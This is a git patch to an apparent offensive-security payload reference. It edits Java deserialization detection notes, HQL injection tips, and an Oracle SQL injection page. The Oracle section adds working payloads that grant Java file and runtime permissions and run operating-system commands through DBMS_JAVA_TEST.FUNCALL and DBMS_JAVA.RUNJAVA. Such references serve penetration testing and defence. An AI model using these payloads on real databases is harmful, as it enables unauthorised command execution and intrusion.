From c7dd67986c4ef9c7bb36710c978b3bdfc64555b1 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 13 Sep 2022 22:04:21 +0200 Subject: [PATCH] Oracle SQL --- Insecure Deserialization/Java.md | 8 ++++--- SQL Injection/HQL Injection.md | 4 +++- SQL Injection/OracleSQL Injection.md | 31 +++++++++++++++++++++++++++- 3 files changed, 38 insertions(+), 5 deletions(-) diff --git a/Insecure Deserialization/Java.md b/Insecure Deserialization/Java.md index 7b45d3a..71404a6 100644 --- a/Insecure Deserialization/Java.md +++ b/Insecure Deserialization/Java.md @@ -2,10 +2,12 @@ ## Detection -- "AC ED 00 05" in Hex -- "rO0" in Base64 +- `"AC ED 00 05"` in Hex + * `AC ED`: STREAM_MAGIC. Specifies that this is a serialization protocol. + * `00 05`: STREAM_VERSION. The serialization version. +- `"rO0"` in Base64 - Content-type = "application/x-java-serialized-object" -- "H4sIAAAAAAAAAJ" in gzip(base64) +- `"H4sIAAAAAAAAAJ"` in gzip(base64) ## Exploit diff --git a/SQL Injection/HQL Injection.md b/SQL Injection/HQL Injection.md index 97d3672..fbb618e 100644 --- a/SQL Injection/HQL Injection.md +++ b/SQL Injection/HQL Injection.md @@ -15,6 +15,8 @@ * [Methods by DBMS](#methods-by-dbms) * [References](#references) +:warning: Your input will always be between the percentage symbols: `%INJECT_HERE%` + ## HQL Comments ```sql @@ -134,7 +136,7 @@ public class Constants { Some usable constants in well-known Java libraries: -``` +```ps1 org.apache.batik.util.XMLConstants.XML_CHAR_APOS [ Apache Batik ] com.ibm.icu.impl.PatternTokenizer.SINGLE_QUOTE [ ICU4J ] jodd.util.StringPool.SINGLE_QUOTE [ Jodd ] diff --git a/SQL Injection/OracleSQL Injection.md b/SQL Injection/OracleSQL Injection.md index 7050267..36d0514 100644 --- a/SQL Injection/OracleSQL Injection.md +++ b/SQL Injection/OracleSQL Injection.md @@ -77,10 +77,37 @@ SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) comment: -- /**/ ``` -## Oracle SQL Command execution +## Oracle SQL Command Execution * [ODAT (Oracle Database Attacking Tool)](https://github.com/quentinhardy/odat) +### Oracle Java Execution + +* List Java privileges + ```sql + select * from dba_java_policy + select * from user_java_policy + ``` +* Grant privileges + ```sql + exec dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission','<>','execute'); + exec dbms_java.grant_permission('SCOTT','SYS:java.lang.RuntimePermission', 'writeFileDescriptor', ''); + exec dbms_java.grant_permission('SCOTT','SYS:java.lang.RuntimePermission', 'readFileDescriptor', ''); + ``` +* Execute commands + * 10g R2, 11g R1 and R2: `DBMS_JAVA_TEST.FUNCALL()` + ```sql + SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe','/c', 'dir >c:\test.txt') FROM DUAL + SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/bin/bash','-c','/bin/ls>/tmp/OUT2.LST') from dual + ``` + * 11g R1 and R2: `DBMS_JAVA.RUNJAVA()` + ```sql + SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper /bin/bash -c /bin/ls>/tmp/OUT.LST') FROM DUAL + ``` + + +### Oracle Java Class + ```sql /* create Java class */ BEGIN @@ -112,3 +139,5 @@ SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual; * [NetSpi - SQL Wiki](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle) * [ASDC12 - New and Improved Hacking Oracle From Web](https://owasp.org/www-pdf-archive/ASDC12-New_and_Improved_Hacking_Oracle_From_Web.pdf) +* [Pentesting Oracle TNS Listener - HackTricks](https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener) +* [ODAT: Oracle Database Attacking Tool](https://github.com/quentinhardy/odat/wiki/privesc) \ No newline at end of file